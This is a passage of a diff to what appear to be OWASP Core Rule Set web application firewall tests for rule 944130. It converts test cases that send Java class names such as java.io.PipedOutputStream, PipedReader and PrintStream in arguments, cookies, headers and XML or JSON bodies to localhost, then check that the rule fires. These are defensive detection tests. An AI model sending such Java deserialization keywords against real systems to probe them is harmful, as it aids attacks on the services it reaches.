"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 202 desc: "Cookie name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-203 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 203 desc: "Request header test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-204 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 204 desc: "XML attribute value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-205 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 205 desc: "XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-206 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 206 desc: "Nested XML element value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-207 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 207 desc: "Content-Type text/plain includes keyword java.io.PipedOutputStream" stages: - - stage: - 
input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-208 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 208 desc: "Content-Type application/json arg value includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-209 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"java.io.PipedOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 209 desc: "Content-Type application/json arg name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-210 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 210 desc: "Argument test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-211 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 211 desc: "Argument name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-212 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 212 desc: "Cookie test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 
log_contains: "id \"944130\"" - - test_title: 944130-213 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 213 desc: "Cookie name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PipedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-214 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PipedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 214 desc: "Request header test includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
- Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PipedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-215 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PipedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 215 desc: "XML attribute value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-216 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 216 desc: "XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-217 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 217 desc: "Nested XML element value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-218 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 218 desc: "Content-Type text/plain includes keyword java.io.PipedReader" stages: - - 
stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-219 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PipedReader" + output: + log: + expect_ids: [944130] + - test_id: 219 desc: "Content-Type application/json arg value includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PipedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-220 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PipedReader\"}" + 
output: + log: + expect_ids: [944130] + - test_id: 220 desc: "Content-Type application/json arg name includes keyword java.io.PipedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PipedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-221 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PipedReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 221 desc: "Argument test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-222 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 222 desc: "Argument name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-223 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream=test" + output: + log: + expect_ids: [944130] + - test_id: 223 desc: "Cookie test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-224 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 224 desc: "Cookie name includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PrintStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-225 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.PrintStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 225 desc: "Request header test includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: 
java.io.PrintStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-226 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PrintStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 226 desc: "XML attribute value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-227 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 227 desc: "XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-228 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 228 desc: "Nested XML element value includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PrintStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-229 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PrintStream" + output: + log: + expect_ids: [944130] + - test_id: 229 desc: "Content-Type text/plain includes keyword java.io.PrintStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - 
